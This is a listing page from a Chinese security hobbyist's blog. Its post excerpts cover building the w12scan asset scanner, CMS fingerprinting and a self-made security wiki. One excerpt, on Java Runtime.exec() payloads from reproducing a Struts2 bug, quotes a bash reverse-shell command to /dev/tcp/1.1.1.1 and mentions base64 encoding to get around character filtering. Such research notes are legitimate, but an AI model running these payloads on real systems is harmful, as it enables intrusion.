各类折腾

折腾各种新奇的想法,并记录笔记

各类折腾

w12scan 在线部署记录

阅读(2410)评论(14)

我太兴奋了,将w12scan在线部署成功,并且也达到了令人满意的效果。 0x00w12scan之前一直在本地测试,局限太大,每次启动就要掉我不少电,尝试过在vps上启动,但是vps配置太低,跑不动es。一度很想放弃。。 0x01昨天晚上,突然想起了elasticsearch云服务,在对比了阿里云、腾讯云、百度云和华为云之后,只有阿里云提供了试用服务,腾讯...

各类折腾

w12scan docker-compose 编排踩坑.md

阅读(776)评论(0)

w11scan的时候dockerfile写得快要吐血了,本想着有了w11scan踩过的坑,w12scan应该简单才是,没想到更大的坑在等着我。 前置 前置大概浏览一遍 docker从入门到实践 https://www.hacking8.com/docker-practice/ w12scan需要多服务一起启动,有c...

各类折腾

w12scan WEB端完成了

阅读(1399)评论(1)

大年三十,一边看着春晚,一边修改细节,最后成品感觉挺不错的。web端完成了,对这个作品越来越期待了。今天想了下,觉得w12scan的架构有点复杂, 如果不是我自己的话,其他人部署可能会很困难,曾经我就是不喜欢这样困难的部署才造轮子的,所以,我觉得w12scan的部署至少应该也是一键化的,在Windows,mac,Linux上都是这样。 ...

各类折腾

w12scan - 1 宣传视频

阅读(637)评论(3)

为什么是1号,因为这是第一个演示视频,功能还没有完善,所以先录了一小段。后面也会有二号和三号视频 w12scan-2.mp4https://x.hacking8.com/content/uploadfile/201902/w12scan-preview.mp4

各类折腾

自建“信息安全”wiki类自学网站 - 像黑客一样学习

阅读(1011)评论(9)

这是今年计划的一部分,下一步计划根据知道创宇技能表的内容来作为网站目录的大纲。 这个网站主要是给自己无聊的时候看看,优先上线自己不会的内容。 周末两天完成了第一个初始版本,支持导入markdown格式书籍,没有用到数据库,都是根据json来的,新的书籍上线只需要修改一下json格式即可上线,简单方便~ 前端简单的用bootstrap修饰了一下,勉强能看...

各类折腾

⚡️w12scan的前端设计原型图&Django 记录

阅读(1350)评论(0)

为w12scan的前端设计了四张草稿,然后用Django简单的跑了下,gif录制程序可能有点失真,在本机上效果不错的。里面的数据都是临时填充的垃圾数据,不是真实数据。接下来就是功能性的设计和数据库的设计了。 Django installation recordInstallneed python >= 3pip install django mysq...

各类折腾

w12scan 想法和front-end

阅读(1242)评论(0)

很久之前就有w12scan的想法,但是一直停留在那里,这次借毕业设计的机会,将它实现出来!~ Thinking原本设计出来是为了寻找SRC的资产等信息,后来觉得可以在扩大一下,保留SRC资产的收集功能,将范围扩大到全网。具体我想模仿zoomeye,fofa的全网检索功能,所以会将所有的域名IP信息进行深度的指纹识别入库,保留SRC的功能是指我可以随时指定扫...

各类折腾

Java Runtime.getRuntime().exec() 的那些payloads

阅读(3194)评论(0)

0x01在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

各类折腾

博客升级计划

阅读(2842)评论(2)

改装博客因为一些数据的历史性,加上也不想在折腾其他博客了,本来想自己写个博客的,但那时因为之前自己域名在国外,速度很慢,想做成静态化减小资源压力。但现在博客以及在国内备案,用腾讯云学生主机还是绰绰有余,所以没有自己造轮子的必要了,主要是解决一下emlog长久不更新内心存在的”不安全感”。 原系统中好多功能可以更加优美,加上漏洞部分,所以我决定对博客系统...

各类折腾

CMS在线识别(三)数据统计

阅读(1452)评论(0)

在全网扫描时,对CMS指纹进行分析,想法是仅从首页或者一些地方就可以获取到,尽量不使用指纹库中庞大的路径扫描。 同时也统计排名Top使用的cms,数据为airbug项目提供参考。 查询语句: SELECT result,count(id) as total FROM `whatcms_result` group by re...

鄂ICP备18025574号 RSS订阅

Powered by emlog © Emlog大前端 theme By 小草窝 SiteMap